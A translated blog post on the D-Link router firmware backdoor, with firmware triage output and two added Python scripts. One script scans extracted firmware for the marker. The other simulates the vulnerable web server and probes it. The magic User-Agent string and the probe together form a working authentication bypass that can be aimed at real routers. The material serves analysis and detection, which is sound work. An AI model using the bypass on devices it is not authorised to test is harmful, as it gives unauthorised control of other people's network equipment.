An embedded-device security researcher has reverse-engineered a backdoor in the firmware of D-Link routers. D-Link's firmware is developed by Alpha Networks, a Taiwanese ODM spun off from D-Link. The researcher found that no authentication is required at all: any request whose browser User-Agent string is "xmlset_roodkcableoj28840ybtide" (without the quotes) is granted access to the router's web interface and can view and change the device's settings. Affected D-Link models include the DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604+ and TM-G5240. Readers noticed that the string roodkcableoj28840ybtide read backwards is "edit by 04882 joel backdoor"; Joel may be Joel Liu, a senior technical director at Alpha Networks.

Below is NeoAtlantis's excerpt and translation of part of the content at http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/:

Based on the source code of the HTML pages and some Shodan search results, it can be reasonably concluded that the following D-Link devices are likely affected:

  • DIR-100
  • DI-524
  • DI-524UP
  • DI-604S
  • DI-604UP
  • DI-604+
  • TM-G5240

Additionally, several Planex routers also appear to use the same firmware:

  • BRL-04UR
  • BRL-04CW

An analysis

Howdy y'all,

(These notes will probably be obsolete by the time you read them, but so it goes. The TL;DR is that /bin/xmlsetc is the client for the D-Link backdoor.)

Craig exposed a new D-Link backdoor today, so I took a look at all images in my local copy of their FTP site. His article at the following URL describes the backdoor, explains how he found it and how to call it. I have just a little to add.

http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/

The backdoor seems specific to eight firmware images, which I extracted from .bix files using binwalk. None of the .bin or .img files seem to contain the backdoor.

% grep roodkcab `find . -name webs`
Binary file ./_DIR100_v5.0.0EUb3_patch02.bix.extracted/squashfs-root/bin/webs matches
Binary file ./_TM-G5240-alpha-v4-0-0b20.bix.extracted/squashfs-root/bin/webs matches
Binary file ./_di604UP_firmware_103_BETA.bix.extracted/squashfs-root/bin/webs matches
Binary file ./_tm-g5240-alpha-v4-0-0b17.bix.extracted/squashfs-root/bin/webs matches
Binary file ./_TM-G5240-b26_320k.bix.extracted/squashfs-root/bin/webs matches
Binary file ./_TM-G5240-4.0.0b28.bix.extracted/squashfs-root/bin/webs matches
Binary file ./_TM-G5240-alpha-v4.0.0b23.bix.extracted/squashfs-root/bin/webs matches
Binary file ./_TM-G5240-v4-0-0b29.bix.extracted/squashfs-root/bin/webs matches
%

In addition to /bin/webs containing the string "xmlset_roodkcableoj28840ybtide", it also appears in /bin/xmlsetc. Of my eight images, there are only two unique versions of xmlsetc, while every one of the eight webs copies is distinct.

% md5sum `find . -name xmlsetc` | sort
5c79f358a60280248098db10d6446528 ./_tm-g5240-alpha-v4-0-0b17.bix.extracted/squashfs-root/bin/xmlsetc
5c79f358a60280248098db10d6446528 ./_TM-G5240-alpha-v4-0-0b20.bix.extracted/squashfs-root/bin/xmlsetc
5c79f358a60280248098db10d6446528 ./_TM-G5240-alpha-v4.0.0b23.bix.extracted/squashfs-root/bin/xmlsetc
a443b1455ae3db9a572a685da51fabec ./_di604UP_firmware_103_BETA.bix.extracted/squashfs-root/bin/xmlsetc
a443b1455ae3db9a572a685da51fabec ./_DIR100_v5.0.0EUb3_patch02.bix.extracted/squashfs-root/bin/xmlsetc
a443b1455ae3db9a572a685da51fabec ./_TM-G5240-4.0.0b28.bix.extracted/squashfs-root/bin/xmlsetc
a443b1455ae3db9a572a685da51fabec ./_TM-G5240-b26_320k.bix.extracted/squashfs-root/bin/xmlsetc
a443b1455ae3db9a572a685da51fabec ./_TM-G5240-v4-0-0b29.bix.extracted/squashfs-root/bin/xmlsetc
% md5sum `find . -name webs` | sort
07abc2afebb8fb90fd650a30f1f0b789 ./_TM-G5240-alpha-v4-0-0b20.bix.extracted/squashfs-root/bin/webs
46637832adbd4056e97ab38aaaf31da4 ./_DIR100_v5.0.0EUb3_patch02.bix.extracted/squashfs-root/bin/webs
78da0913e50b2deb93bc9fe3a8a8d1cd ./_TM-G5240-b26_320k.bix.extracted/squashfs-root/bin/webs
8fe0c80d230bf207bfaeb16b70ef8a45 ./_TM-G5240-v4-0-0b29.bix.extracted/squashfs-root/bin/webs
9318210953eb2dcd6895f091cdc847a1 ./_TM-G5240-alpha-v4.0.0b23.bix.extracted/squashfs-root/bin/webs
9e57fe42a4c1dad21460a13c22356096 ./_tm-g5240-alpha-v4-0-0b17.bix.extracted/squashfs-root/bin/webs
e183a94c5f17bb186d663ac915fe71ff ./_di604UP_firmware_103_BETA.bix.extracted/squashfs-root/bin/webs
ecc427017d2fa3d88faf65fc26d0ab5f ./_TM-G5240-4.0.0b28.bix.extracted/squashfs-root/bin/webs
%

A quick glance at xmlsetc in IDA shows that it is sending the backdoor User-Agent with printf(), rather than receiving it. Perhaps the backdoor serves some legitimate purpose, and Mystery Joel is only guilty of incompetence and not of malice?

I'm too busy to look further, but I hope you neighbors have fun. Cheers from Philly, –TG
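Travis's grep and md5sum one-liners above can be generalized into a small triage script. The following is an added example, not code from the article or from Travis Goodspeed's note; the firmware paths and file contents it writes for its demo run are constructed, not real D-Link images. It walks every file under each extracted root rather than only bin/webs (so the copy of the marker in bin/xmlsetc is reported alongside it), streams large files instead of loading them whole, and groups matching files by MD5 so the number of distinct builds of each binary is visible at a glance.

```python
"""Triage extracted firmware trees for the D-Link backdoor marker.

Added example; not code from devttys0.com or from the D-Link firmware.
"""
import hashlib
import os
import tempfile
from collections import defaultdict

MARKER = b"xmlset_roodkcableoj28840ybtide"  # the magic string from the article


def md5_of(path, chunk_size=1 << 20):
    """Hex MD5 of a file, read in chunks so large images are not loaded whole."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def file_contains(path, needle, chunk_size=1 << 20):
    """Stream the file and report whether needle occurs anywhere in it.

    An overlap of len(needle) - 1 bytes is carried between chunks so a match
    that straddles a chunk boundary is not missed.
    """
    keep = len(needle) - 1
    tail = b""
    with open(path, "rb") as fh:
        while True:
            chunk = fh.read(chunk_size)
            if not chunk:
                return False
            buf = tail + chunk
            if needle in buf:
                return True
            tail = buf[-keep:] if keep else b""


def scan(roots, needle=MARKER):
    """Return {basename: {md5: [paths]}} for every regular file under roots
    that contains needle. Symlinks are skipped so busybox-style link farms
    do not produce duplicate hits."""
    hits = defaultdict(lambda: defaultdict(list))
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                if os.path.islink(path) or not os.path.isfile(path):
                    continue
                if file_contains(path, needle):
                    hits[name][md5_of(path)].append(path)
    return {name: dict(versions) for name, versions in hits.items()}


def report(hits):
    """Render scan() output: one line per binary name, copies listed under their hash."""
    lines = []
    for name in sorted(hits):
        versions = hits[name]
        copies = sum(len(paths) for paths in versions.values())
        lines.append(f"{name}: {copies} copies, {len(versions)} distinct build(s)")
        for digest in sorted(versions):
            for path in sorted(versions[digest]):
                lines.append(f"  {digest}  {path}")
    return "\n".join(lines)


def make_demo_tree(base_dir=None):
    """Write a constructed miniature of two extracted images (not real firmware):
    two different webs builds, two identical xmlsetc copies, one clean binary."""
    base = base_dir or tempfile.mkdtemp(prefix="dlink_demo_")
    files = {
        "_imgA.bix.extracted/squashfs-root/bin/webs": b"\x7fELF webs build A " + MARKER + b"\x00",
        "_imgB.bix.extracted/squashfs-root/bin/webs": b"\x7fELF webs build B " + MARKER + b"\x00",
        "_imgA.bix.extracted/squashfs-root/bin/xmlsetc": b"\x7fELF xmlsetc " + MARKER + b"\x00",
        "_imgB.bix.extracted/squashfs-root/bin/xmlsetc": b"\x7fELF xmlsetc " + MARKER + b"\x00",
        "_imgA.bix.extracted/squashfs-root/bin/busybox": b"\x7fELF busybox, no marker\x00",
    }
    for rel, data in files.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return base


if __name__ == "__main__":
    import sys
    # Pass one or more extracted roots (e.g. the *.bix.extracted directories binwalk
    # produces); with no arguments the constructed demo tree is scanned instead.
    roots = sys.argv[1:] or [make_demo_tree()]
    print(report(scan(roots)))
```

Because hits are keyed by file name and then by hash, the output immediately shows the pattern Travis observed by hand: one name with several hashes means several distinct builds of the same binary, one hash shared across images means the same binary was reused unchanged.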

A guess about this backdoor

The ever neighborly Travis Goodspeed pointed out that this backdoor is used by the /bin/xmlsetc binary in the D-Link firmware. After some grepping, I found several binaries that appear to use xmlsetc to automatically re-configure the device's settings (example: dynamic DNS). My guess is that the developers realized that some programs/services needed to be able to change the device's settings automatically; realizing that the web server already had all the code to change these settings, they decided to just send requests to the web server whenever they needed to change something. The only problem was that the web server required a username and password, which the end user could change. Then, in a eureka moment, Joel jumped up and said, "Don't worry, for I have a cunning plan!".

Also, several people have reported in the comments that some versions of the DIR-615 are also affected, including those distributed by Virgin Mobile. I have not yet verified this, but it seems quite reasonable.
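The exchange Craig describes (a local client such as xmlsetc sending a request carrying the magic User-Agent, and the web server skipping its password check when it sees it) can be reproduced end to end against a simulated device. The following is an added example, not code from devttys0.com and not the D-Link firmware's own logic: the server is a simplified stand-in for /bin/webs whose route, HTTP Basic credential and page body are constructed for the demo, and the "fixed" variant simply drops the User-Agent shortcut, which is an illustrative fix rather than D-Link's actual patch. The probe function is the check a practitioner would run against a real device: it compares the response to an ordinary browser User-Agent with the response to the magic one, so a device that simply has no password set does not register as a false positive.

```python
"""Simulated D-Link 'xmlset' User-Agent auth bypass, with a probe for it.

Added example; the server below is a constructed stand-in for /bin/webs, not
the firmware's code. Only the magic User-Agent string comes from the article.
"""
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

BACKDOOR_UA = "xmlset_roodkcableoj28840ybtide"  # magic User-Agent from the article
# Constructed credential and page body for the demo (assumptions, not D-Link's).
ADMIN_AUTH = "Basic " + base64.b64encode(b"admin:s3cret").decode()
PAGE = b"<html><head><title>D-Link Router Configuration</title></head></html>"


class RouterHandler(BaseHTTPRequestHandler):
    """Stand-in for /bin/webs. With backdoor_enabled=True it mimics the vulnerable check."""
    backdoor_enabled = True

    def is_authenticated(self):
        # The bug: a matching User-Agent short-circuits the password check entirely,
        # which is how a local client like xmlsetc gets in without knowing the password.
        if self.backdoor_enabled and self.headers.get("User-Agent") == BACKDOOR_UA:
            return True
        # Otherwise require HTTP Basic credentials (a simplification of the real login).
        return self.headers.get("Authorization") == ADMIN_AUTH

    def do_GET(self):
        if not self.is_authenticated():
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="DIR-100"')
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(PAGE)))
        self.end_headers()
        self.wfile.write(PAGE)

    def log_message(self, *args):
        pass  # keep the demo quiet


class FixedHandler(RouterHandler):
    """Same server with the User-Agent shortcut removed (illustrative fix, not D-Link's)."""
    backdoor_enabled = False


def start_server(handler):
    """Bind a free loopback port, serve in a background thread, return (server, base URL)."""
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d/" % srv.server_address[1]


def fetch_status(url, user_agent):
    """GET url with the given User-Agent and no credentials; return the HTTP status code."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.getcode()
    except urllib.error.HTTPError as err:
        return err.code


def probe(base_url):
    """True if the magic User-Agent gets a 200 where an ordinary browser UA is refused.

    Comparing both responses avoids a false positive on a device that has no
    password set at all, where both requests would succeed.
    """
    normal = fetch_status(base_url, "Mozilla/5.0 (compatible; probe)")
    magic = fetch_status(base_url, BACKDOOR_UA)
    return normal in (401, 403) and magic == 200


if __name__ == "__main__":
    for label, handler in (("vulnerable", RouterHandler), ("fixed", FixedHandler)):
        srv, url = start_server(handler)
        print(f"{label} server at {url}: backdoor reachable = {probe(url)}")
        srv.shutdown()
        srv.server_close()
```

To check a real device, call probe() with the router's LAN management URL instead of the simulated server, and only against equipment you are authorized to test. A 401 for the browser UA and a 200 for the magic UA on the same URL is the signature described in the article; two 200s means the device has no password set and tells you nothing about the backdoor.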


Testing a DIR-600M I have at hand turned up no sign of the backdoor above. But (as anyone with a bit of common sense can see) I have already lost confidence in this brand.